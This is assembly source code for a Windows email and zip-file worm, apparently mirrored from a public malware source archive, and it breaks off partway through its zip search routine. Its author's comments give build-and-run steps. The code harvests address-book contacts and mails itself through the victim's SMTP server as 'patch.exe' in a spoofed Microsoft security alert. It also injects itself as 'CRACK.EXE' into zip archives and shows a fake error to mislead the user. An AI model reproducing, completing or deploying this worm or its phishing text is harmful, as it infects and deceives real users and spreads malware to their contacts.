mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-26 03:55:06 +00:00
970 lines
22 KiB
NASM
970 lines
22 KiB
NASM
|
;
|
|||
|
; W32/ZipLing -
|
|||
|
;
|
|||
|
; First of all this is the source code to an I-Worm. I do not guarantee it works, although
|
|||
|
; I have tested it on my system and it had seemed to work. I lost interest in it after a while
|
|||
|
; so I completely forgot about it until one day, when i decided to finish my I-Worm ;). It should
|
|||
|
; work however, because as far as my short-term memory goes back it seemed to work OK where it
|
|||
|
; was at a couple of weeks ago. Basically now I just added in the threads and took out the breakpoints,
|
|||
|
; so I think it should travel nicely (if it was spreaded). Anyway, please contact me if you find
|
|||
|
; a problem or if you'd like to comment on it. I am not responsible for what happens to you or
|
|||
|
; other people if you use it. You've been warned =)
|
|||
|
;
|
|||
|
;
|
|||
|
; This is my I-Worm. I been workin on it for about 4 weeks (i took a bit of a break for 1
|
|||
|
; week:). It doesn't travel by MAPI but it does somewhat rely on Outlook. It needs Windows
|
|||
|
; Address Book, but this shouldn't be a problem because most people have outlook. It uses its
|
|||
|
; own SMTP engine. It Mime encodes the worm EXE and sends it out to all addresses in the default
|
|||
|
; WAB file. As you can see, this can spread very well if it gets sent to the right place. This
|
|||
|
; worm uses many anti-debug and anti-emu tricks, to make detection of it harder. It creates 2 threads:
|
|||
|
; 1 checks 1 drive for zip files, dropping a crack.exe over all of them.
|
|||
|
; User may think it is a bit suspicious but I'm sure he doesnt look at all of his zip files. Other thread
|
|||
|
; finds email addresses and sends each a copy of the worm+msg from microsoft :). Worm is named patch.exe
|
|||
|
; and claims to fix a serious bug inside windows core (kernel32) files. It doesn't though; it just gives
|
|||
|
; a message saying corrupt CRC or something the like. The file that it drops inside zip files says same
|
|||
|
; thing, and since they are crack.exe and patch.exe it should fit both.
|
|||
|
;
|
|||
|
;
|
|||
|
; This source is does not have many comments. If you want to learn how to create a worm,
|
|||
|
; I recommend you try the MAPI way first. There are a couple of ASM worms that are straight
|
|||
|
; forward for you to learn on.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; How to build:
|
|||
|
; (masm32)
|
|||
|
; ml /c /coff ziplung.asm
|
|||
|
; link /SUBSYSTEM:WINDOWS ziplung.obj
|
|||
|
; pewrsec ziplung.exe
|
|||
|
; ziplung.exe
|
|||
|
; ^^^^^^^^^^^-> hehehe
|
|||
|
;
|
|||
|
; please pay visit to http://bluebola.8k.com !
|
|||
|
;
|
|||
|
; and.. Enjoy.
|
|||
|
|
|||
|
.486p
|
|||
|
.model flat,stdcall
|
|||
|
option casemap :none
|
|||
|
include \masm32\include\windows.inc
|
|||
|
include \masm32\include\zipfile.inc
|
|||
|
include \masm32\include\advapi32.inc
|
|||
|
include \masm32\include\kernel32.inc
|
|||
|
include \masm32\include\wsock32.inc
|
|||
|
include \masm32\include\user32.inc
|
|||
|
includelib \masm32\lib\kernel32.lib
|
|||
|
includelib \masm32\lib\wsock32.lib
|
|||
|
includelib \masm32\lib\advapi32.lib
|
|||
|
includelib \masm32\lib\user32.lib
|
|||
|
|
|||
|
SearchZIP PROTO :DWORD
|
|||
|
thread1 PROTO
|
|||
|
thread2 PROTO
|
|||
|
|
|||
|
.code ; CODE SECTION of worm
|
|||
|
start:
|
|||
|
jmp @F
|
|||
|
|
|||
|
filename db 128 dup (?)
|
|||
|
szTemp db "tmp9174.tmp",0
|
|||
|
mem01 dd 0
|
|||
|
hTemp dd 0
|
|||
|
tSize dd 0
|
|||
|
thid1 dd 0
|
|||
|
thid2 dd 0
|
|||
|
fr db 260 dup (?)
|
|||
|
msg db "Could not patch due to bad CRC!",0
|
|||
|
@@:
|
|||
|
invoke GetModuleFileName,0,addr filename,128
|
|||
|
invoke CopyFile,addr filename,addr szTemp,0
|
|||
|
invoke CreateFile,addr szTemp,0c0000000h,01h,00h,03h,00h,00h
|
|||
|
mov hTemp,eax
|
|||
|
invoke GetFileSize,EAX,0
|
|||
|
mov ebx,eax
|
|||
|
invoke GlobalAlloc,0,eax
|
|||
|
mov mem01,eax
|
|||
|
invoke ReadFile,hTemp,mem01,ebx,addr filename,00h
|
|||
|
invoke CloseHandle,hTemp
|
|||
|
; MEM01 now = ptr to our EXE. We need this for MIME and ZIP appending
|
|||
|
mov tSize,EBX
|
|||
|
mov zpC_S1,EBX ; adjust the size of our data
|
|||
|
mov zpC_S2,EBX
|
|||
|
mov zpL_S1,EBX
|
|||
|
mov zpL_S2,EBX
|
|||
|
|
|||
|
invoke MessageBox,0,addr msg,0,0
|
|||
|
|
|||
|
invoke CreateThread,0,0,addr thread1,addr fr,0,addr thid1
|
|||
|
mov ebx,eax
|
|||
|
|
|||
|
invoke CreateThread,0,0,addr thread2,0,0,addr thid2
|
|||
|
mov esi,eax
|
|||
|
|
|||
|
invoke WaitForSingleObject,ebx,-1
|
|||
|
invoke WaitForSingleObject,esi,-1
|
|||
|
jmp LeaveNow
|
|||
|
|
|||
|
Recipient db 256 dup (?)
|
|||
|
sizeRecip dd $-Recipient
|
|||
|
|
|||
|
sendtable:
|
|||
|
dd offset SendHelo ; HELO LocalHost
|
|||
|
dd offset SendFrom ; MAIL FROM:
|
|||
|
dd offset SendRcpt ; RCPT TO:
|
|||
|
dd offset SendData1 ; send the DATA part of the message
|
|||
|
dd offset SendData2 ; sends the actual DATA
|
|||
|
dd offset SendQuit ; send the QUIT part
|
|||
|
dd 00000000h ; end marka
|
|||
|
buffer db 512 dup (?)
|
|||
|
; Used for SELECT calls
|
|||
|
Timeout:
|
|||
|
dd 5
|
|||
|
dd 0
|
|||
|
FDSet:
|
|||
|
dd 1
|
|||
|
MailSocket dd 0
|
|||
|
SendWorm: ; This little part of the worm does this here:
|
|||
|
; Gets Default Email server
|
|||
|
; Connects to it
|
|||
|
; Sends the message
|
|||
|
pushad
|
|||
|
openkey:
|
|||
|
xor eax,eax
|
|||
|
call @F
|
|||
|
phkMailKey dd 0
|
|||
|
@@:
|
|||
|
push KEY_ALL_ACCESS
|
|||
|
push eax
|
|||
|
call @F
|
|||
|
db "Software\Microsoft\Internet Account Manager"
|
|||
|
slashkey db 0
|
|||
|
db "Accounts\"
|
|||
|
lpDefaultAccount db 8 dup(0)
|
|||
|
db 0
|
|||
|
@@:
|
|||
|
push HKEY_CURRENT_USER
|
|||
|
call RegOpenKeyEx
|
|||
|
|
|||
|
or eax,eax
|
|||
|
jnz LeaveNow
|
|||
|
|
|||
|
cmp byte ptr [slashkey],0
|
|||
|
jnz getsmtpmail
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
call @F
|
|||
|
dd 00000009h
|
|||
|
@@:
|
|||
|
push offset lpDefaultAccount
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
call @F
|
|||
|
db "Default Mail Account",0
|
|||
|
@@:
|
|||
|
push dword ptr [phkMailKey]
|
|||
|
call RegQueryValueEx
|
|||
|
push dword ptr [phkMailKey]
|
|||
|
call RegCloseKey
|
|||
|
mov byte ptr [slashkey],'\'
|
|||
|
jmp openkey
|
|||
|
getsmtpmail:
|
|||
|
xor eax,eax
|
|||
|
call @F
|
|||
|
dd 00000200h ; 512 bytes
|
|||
|
@@:
|
|||
|
push offset buffer
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
call @F
|
|||
|
db "SMTP Server",0
|
|||
|
@@:
|
|||
|
push dword ptr [phkMailKey]
|
|||
|
call RegQueryValueEx
|
|||
|
push dword ptr [phkMailKey]
|
|||
|
call RegCloseKey
|
|||
|
|
|||
|
lea edi,buffer
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
call @F
|
|||
|
pp2 WSADATA <?>
|
|||
|
@@:
|
|||
|
push 0101h
|
|||
|
call WSAStartup
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push edi
|
|||
|
call gethostbyname
|
|||
|
|
|||
|
mov eax,[eax+12]
|
|||
|
mov eax,[eax]
|
|||
|
mov eax,[eax] ; we got the DWORD IP
|
|||
|
|
|||
|
mov dword ptr [dwIPAddress],EAX
|
|||
|
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 2
|
|||
|
call socket
|
|||
|
mov MailSocket,EAX
|
|||
|
inc eax
|
|||
|
jz LeaveNow
|
|||
|
|
|||
|
push 16 ; size of following structure
|
|||
|
call @F
|
|||
|
dw AF_INET
|
|||
|
hPort db 0, 25
|
|||
|
dwIPAddress dd 0
|
|||
|
Reserved2 dd 0,0
|
|||
|
@@:
|
|||
|
push dword ptr [MailSocket]
|
|||
|
call connect
|
|||
|
inc eax
|
|||
|
jz EndWinsock
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
cld
|
|||
|
lea ebx,sendtable ; sendtable = table of functions that operate w/ smtp server
|
|||
|
WaitForResponse: ; check if its ok to read
|
|||
|
xor eax,eax
|
|||
|
push offset Timeout
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push offset FDSet
|
|||
|
push eax
|
|||
|
call select
|
|||
|
|
|||
|
dec eax
|
|||
|
jnz EndWinsock
|
|||
|
|
|||
|
call @worm_recv ; receive the data into ptr supplied by ESI
|
|||
|
or eax,eax
|
|||
|
jz EndWinsock
|
|||
|
|
|||
|
lodsb
|
|||
|
dec esi ; we dont want to modify ESI
|
|||
|
okiebyte equ $+1 ; to change the 032h
|
|||
|
cmp al,032h ; 032h = "2" = OK :)
|
|||
|
jnz EndWinsock ; no no its not ok
|
|||
|
|
|||
|
mov byte ptr [okiebyte],032h ; fixor it when we mess it up
|
|||
|
SendOurResponse: ; check if its okay to write
|
|||
|
xor eax,eax
|
|||
|
push offset Timeout
|
|||
|
push eax
|
|||
|
push offset FDSet
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
call select
|
|||
|
|
|||
|
dec eax
|
|||
|
jnz EndWinsock
|
|||
|
|
|||
|
call dword ptr [ebx]
|
|||
|
or eax,eax
|
|||
|
jz EndWinsock ; zero = error
|
|||
|
|
|||
|
cmp dword ptr [ebx+4],0
|
|||
|
jz EndWinsock ; end of table
|
|||
|
|
|||
|
add ebx,4
|
|||
|
jmp WaitForResponse
|
|||
|
SendHelo: ; sends a HELO command
|
|||
|
jmp @F
|
|||
|
pHelo db "HELO LocalHost",0Dh,0Ah
|
|||
|
sHelo equ $-pHelo
|
|||
|
@@:
|
|||
|
lea esi,pHelo
|
|||
|
mov ecx,sHelo
|
|||
|
call @worm_send ; send the data
|
|||
|
ret
|
|||
|
SendQuit: ; sends a QUIT command
|
|||
|
jmp @F
|
|||
|
pQuit db "QUIT",0Dh,0Ah
|
|||
|
sQuit equ $-pQuit
|
|||
|
@@:
|
|||
|
lea esi,pQuit
|
|||
|
mov ecx,sQuit
|
|||
|
call @worm_send ; send the data
|
|||
|
ret
|
|||
|
SendFrom:
|
|||
|
jmp @F
|
|||
|
pFrom db "MAIL FROM:<critical@microsoft.com>",0Dh,0Ah
|
|||
|
sFrom equ $-pFrom
|
|||
|
@@:
|
|||
|
lea esi,pFrom
|
|||
|
mov ecx,sFrom
|
|||
|
call @worm_send
|
|||
|
ret
|
|||
|
SendRcpt:
|
|||
|
jmp @F
|
|||
|
pRcpt db "RCPT TO:<"
|
|||
|
sRcpt equ $-pRcpt
|
|||
|
pRcpt2 db ">",0Dh,0Ah
|
|||
|
sRcpt2 equ $-pRcpt2
|
|||
|
@@:
|
|||
|
lea esi,pRcpt
|
|||
|
mov ecx,sRcpt
|
|||
|
call @worm_send
|
|||
|
|
|||
|
lea esi,Recipient ; who to email it to
|
|||
|
mov ecx,sizeRecip ; Size of the string
|
|||
|
call @worm_send
|
|||
|
|
|||
|
lea esi,pRcpt2
|
|||
|
mov ecx,sRcpt2
|
|||
|
call @worm_send ; send the 0A0Dh so server accepts it
|
|||
|
ret
|
|||
|
SendData1:
|
|||
|
jmp @F
|
|||
|
pData db "DATA",0Dh,0Ah
|
|||
|
sData equ $-pData
|
|||
|
@@:
|
|||
|
lea esi,pData
|
|||
|
mov ecx,sData
|
|||
|
call @worm_send
|
|||
|
mov byte ptr [okiebyte],033h
|
|||
|
ret
|
|||
|
SendData2:
|
|||
|
jmp @F
|
|||
|
pData2 db "From: Microsoft Critical Response Team <critical@microsoft.com>",0Dh,0Ah
|
|||
|
db "Subject: Urgent message for all Windows users",0Dh,0Ah
|
|||
|
db "MIME-Version: 1.0",0Dh,0Ah
|
|||
|
db 'Content-Type: multipart/mixed; boundary="bound"',0Dh,0Ah
|
|||
|
db 0Dh,0Ah
|
|||
|
db '--bound',0Dh,0Ah
|
|||
|
db 'Content-Type: text/plain; charset=ISO-8859-1',0Dh,0Ah
|
|||
|
db 'Content-Transfer-Encoding: 7bit',0Dh,0Ah
|
|||
|
db 0Dh,0Ah
|
|||
|
db "Dear Windows User,",0Dh,0Ah
|
|||
|
db 0Dh,0AH
|
|||
|
db " The Microsoft Security Experts have discovered a bug inside the Windows'",0Dh,0Ah
|
|||
|
db " files that poses a security threat to all versions of Windows newer than ",0Dh,0Ah
|
|||
|
db " Windows98 (including Windows98). Virus experts have reported that few known",0Dh,0Ah
|
|||
|
db " viruses have been identified using this exploit, but more are expected. A ",0Dh,0Ah
|
|||
|
db " patch has been supplied with this email and will fix the security hole. ",0Dh,0Ah
|
|||
|
db 0Dh,0Ah
|
|||
|
db " **THIS MESSAGE WAS DELIVERED VIA MICROSOFT ALERT AUTO-MESSENGER** ",0Dh,0Ah
|
|||
|
db '--bound',0Dh,0Ah
|
|||
|
db 'Content-Type: application/octet-stream; name=patch.exe',0Dh,0Ah
|
|||
|
db 'Content-Transfer-Encoding: base64',0Dh,0Ah
|
|||
|
db 0Dh,0Ah
|
|||
|
|
|||
|
sData2 equ $-pData2
|
|||
|
pDot db 0Dh,0Ah,'--bound--',0Dh,0Ah
|
|||
|
db 0Dh,0Ah
|
|||
|
db "."
|
|||
|
db 0Dh,0Ah
|
|||
|
sDot equ $-pDot
|
|||
|
|
|||
|
mem02 dd 0
|
|||
|
|
|||
|
@@:
|
|||
|
|
|||
|
lea esi,pData2
|
|||
|
mov ecx,sData2
|
|||
|
call @worm_send
|
|||
|
; Send the actual file in mime format
|
|||
|
invoke GlobalAlloc,0,7168*3 ; for mime encoded
|
|||
|
mov mem02,eax
|
|||
|
|
|||
|
mov eax,tSize ; Data size MUST BE DIVISIBLE BY 3!
|
|||
|
mov ecx,3
|
|||
|
xor edx,edx
|
|||
|
div ecx
|
|||
|
inc eax
|
|||
|
xor edx,edx
|
|||
|
mul ecx
|
|||
|
mov ecx,eax
|
|||
|
|
|||
|
mov edx,mem02
|
|||
|
mov eax,mem01
|
|||
|
call encodebase64
|
|||
|
|
|||
|
mov esi,mem02
|
|||
|
call @worm_send
|
|||
|
|
|||
|
lea esi,pDot
|
|||
|
mov ecx,sDot
|
|||
|
call @worm_send
|
|||
|
|
|||
|
invoke GlobalFree,mem02
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
EndWinsock:
|
|||
|
push dword ptr [MailSocket]
|
|||
|
call closesocket
|
|||
|
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
LeaveNow:
|
|||
|
invoke ExitProcess,0
|
|||
|
|
|||
|
@worm_recv:
|
|||
|
lea esi,buffer
|
|||
|
push 0
|
|||
|
push 512
|
|||
|
push esi
|
|||
|
push dword ptr [MailSocket]
|
|||
|
call recv
|
|||
|
ret
|
|||
|
|
|||
|
@worm_send:
|
|||
|
; ESI = ptr to what to send
|
|||
|
; ECX = size of data to send
|
|||
|
push 0
|
|||
|
push ecx
|
|||
|
push esi
|
|||
|
push dword ptr [MailSocket]
|
|||
|
call send
|
|||
|
ret
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; ZIP Appending procedures (c) blueEbola 2001-2002
|
|||
|
; Feel free to distibute this procedure or use it in your own code.
|
|||
|
;
|
|||
|
zipappend:
|
|||
|
jmp @F
|
|||
|
zpLocalFile dd 04034B50h ; PK signature
|
|||
|
dw 0014h
|
|||
|
dw 8000h
|
|||
|
dw 0000h
|
|||
|
dw 8C78h
|
|||
|
dw 8578h
|
|||
|
zpL_crc dd 00000000h
|
|||
|
zpL_S1 dd sizeLoc-data_s
|
|||
|
zpL_S2 dd sizeLoc-data_s
|
|||
|
dw 0009h ; filename = 8 chars long
|
|||
|
dw 0000h
|
|||
|
db "CRACK.EXE" ; Most users run cracks hehe (we give a fake message :)
|
|||
|
data_s:
|
|||
|
sizeLoc equ $
|
|||
|
|
|||
|
fName dd 0 ; pointer to name to infect
|
|||
|
hFile dd 0
|
|||
|
fSize dd 0
|
|||
|
hAlloc dd 0
|
|||
|
dwTempRW dd 0
|
|||
|
|
|||
|
zpCentralDir dd 02014b50h
|
|||
|
db 14h
|
|||
|
db 00h
|
|||
|
db 14h
|
|||
|
db 00h
|
|||
|
dw 8000h
|
|||
|
dw 0000h
|
|||
|
dw 8c78h
|
|||
|
dw 8578h
|
|||
|
zpC_crc dd 00000000h
|
|||
|
zpC_S1 dd sizeLoc-data_s
|
|||
|
zpC_S2 dd sizeLoc-data_s
|
|||
|
dw 0009h
|
|||
|
dw 0,0,0,0
|
|||
|
dd 00000020h
|
|||
|
rvaloc dd 00000000h
|
|||
|
db "CRACK.EXE"
|
|||
|
sizeCen equ $
|
|||
|
@@:
|
|||
|
mov fName,ESI
|
|||
|
|
|||
|
mov ecx,zpL_S1
|
|||
|
mov esi,mem01
|
|||
|
call CRC32
|
|||
|
mov zpC_crc,EAX
|
|||
|
mov zpL_crc,EAX
|
|||
|
|
|||
|
invoke CreateFile,fName,0c0000000h,01h,00h,03h,00h,00h
|
|||
|
mov hFile,EAX
|
|||
|
inc eax
|
|||
|
jz errorzip
|
|||
|
dec eax
|
|||
|
invoke GetFileSize,hFile,0
|
|||
|
mov fSize,EAX
|
|||
|
invoke GlobalAlloc,0,fSize
|
|||
|
mov hAlloc,EAX
|
|||
|
invoke ReadFile,hFile,eax,fSize,addr dwTempRW,0
|
|||
|
invoke CloseHandle,hFile
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; Appends to data to zip files. (c) blueEbola (me'za love copyrights:)
|
|||
|
; Most of this was taken from my zippy_ok.asm file and my article, greetz to me :)
|
|||
|
|
|||
|
mov edi,hAlloc
|
|||
|
add edi,fSize
|
|||
|
sub edi,4
|
|||
|
LocateEndOfCentral:
|
|||
|
cmp dword ptr [edi],06054B50h ; PK signature for endofcentral
|
|||
|
jz FoundEndOfCentral
|
|||
|
dec edi
|
|||
|
jmp LocateEndOfCentral
|
|||
|
FoundEndOfCentral:
|
|||
|
; OK, we have to check if it is infected
|
|||
|
jmp checkzip
|
|||
|
Infect:
|
|||
|
ASSUME EDI:PTR ZIPEndOfCentralDir
|
|||
|
mov esi,[edi].ZECD_RVACentralDir
|
|||
|
|
|||
|
invoke CreateFile,fName,0C0000000h,01h,00h,02h,00h,00h
|
|||
|
mov hFile,EAX
|
|||
|
mov ebx,hAlloc
|
|||
|
invoke WriteFile,hFile,ebx,esi,addr dwTempRW,0
|
|||
|
add ebx,esi
|
|||
|
invoke WriteFile,hFile,addr zpLocalFile,sizeLoc-zpLocalFile,addr dwTempRW,0
|
|||
|
invoke WriteFile,hFile,mem01,tSize,addr dwTempRW,0
|
|||
|
mov ecx,[edi].ZECD_SizeOfCentralDir
|
|||
|
invoke WriteFile,hFile,ebx,ecx,addr dwTempRW,0
|
|||
|
mov rvaloc,esi
|
|||
|
invoke WriteFile,hFile,addr zpCentralDir,sizeCen-zpCentralDir,addr dwTempRW,0
|
|||
|
mov ebx,rvaloc
|
|||
|
|
|||
|
add ebx,sizeLoc-zpLocalFile ; size of file
|
|||
|
add ebx,zpL_S1
|
|||
|
mov ecx,[edi].ZECD_SizeOfCentralDir
|
|||
|
add ecx,sizeCen-zpCentralDir
|
|||
|
mov [edi].ZECD_SizeOfCentralDir,ECX
|
|||
|
inc [edi].ZECD_TotalNumberOfEntries
|
|||
|
inc [edi].ZECD_NumberOfEntries
|
|||
|
mov [edi].ZECD_RVACentralDir,EBX
|
|||
|
|
|||
|
mov ebx,hAlloc
|
|||
|
add ebx,fSize
|
|||
|
sub ebx,edi
|
|||
|
invoke WriteFile,hFile,edi,ebx,addr dwTempRW,0
|
|||
|
invoke CloseHandle,hFile
|
|||
|
|
|||
|
errorzip:
|
|||
|
invoke GlobalFree,hAlloc ; free the mem
|
|||
|
ret
|
|||
|
|
|||
|
checkzip:
|
|||
|
pushad
|
|||
|
search: cmp dword ptr [edi],02014B50h
|
|||
|
jz foundlast
|
|||
|
dec edi
|
|||
|
jmp search
|
|||
|
foundlast: lea edi,[edi+2Eh] ; Filename
|
|||
|
cmp dword ptr [edi],'CARC' ; CRAC*.***
|
|||
|
popad
|
|||
|
jz errorzip ; abort
|
|||
|
jmp Infect
|
|||
|
|
|||
|
CRC32 proc ; ecx = size string esi = string
|
|||
|
push esi ; I found this proc inside T2000's article on encrypting ZIP files
|
|||
|
push edx ; thanx T2000 you're a life saver (i been looking everywhere for good CRC32
|
|||
|
; function because WinZip didn't like my old one!) :) greetz to you!
|
|||
|
stc
|
|||
|
sbb edx,edx
|
|||
|
clc
|
|||
|
cld
|
|||
|
LoadChar:
|
|||
|
lodsb
|
|||
|
xor dl,al
|
|||
|
mov al,08h ; 8 bits
|
|||
|
BitCRC:
|
|||
|
shr edx,1 ; get bit into carry flag
|
|||
|
jnc NoCRC ; not set, no CRC
|
|||
|
xor edx,0EDB88320h ; crc found
|
|||
|
NoCRC: dec al ; next bit
|
|||
|
jnz BitCRC
|
|||
|
loop LoadChar
|
|||
|
|
|||
|
xchg edx,eax
|
|||
|
not eax
|
|||
|
|
|||
|
pop edx
|
|||
|
pop esi
|
|||
|
ret
|
|||
|
CRC32 endp
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; ZIP search procedure
|
|||
|
;
|
|||
|
; Recursive ZIP file find function
|
|||
|
; Infects every 3rd zip file found on the system
|
|||
|
; BTW, In MASM32 v7.0, the FindFile example was created by me :)
|
|||
|
;
|
|||
|
; Requirements: s_path buffer must not contain '\' at the end of it (ie. 'C:\Windows')
|
|||
|
;
|
|||
|
|
|||
|
SearchZIP PROC s_path:DWORD ; ptr at s_path must be 260 bytes long (will crash otherwise!:)
|
|||
|
|
|||
|
LOCAL wTemp[260]:BYTE ; temporary
|
|||
|
LOCAL wfd:WIN32_FIND_DATA
|
|||
|
LOCAL hFind:DWORD
|
|||
|
|
|||
|
invoke Sleep,300d ; wait a 0.3 seconds
|
|||
|
|
|||
|
jmp zerodir ; zero out the string above
|
|||
|
__ret001:
|
|||
|
lea edi,wTemp
|
|||
|
|
|||
|
push edi
|
|||
|
mov esi,s_path
|
|||
|
mov ecx,260
|
|||
|
rep movsb
|
|||
|
pop edi
|
|||
|
|
|||
|
xor al,al
|
|||
|
scasb
|
|||
|
jnz $-1 ; get to the 0byte
|
|||
|
|
|||
|
dec edi
|
|||
|
|
|||
|
mov ax,'*\'
|
|||
|
stosw
|
|||
|
|
|||
|
invoke FindFirstFile,addr wTemp,addr wfd
|
|||
|
mov hFind,EAX
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
jz NoFiles
|
|||
|
pop ebx
|
|||
|
|
|||
|
; API's dont modify EBX- its good for handles
|
|||
|
.while EBX > 0
|
|||
|
lea esi,wfd.cFileName ; filename
|
|||
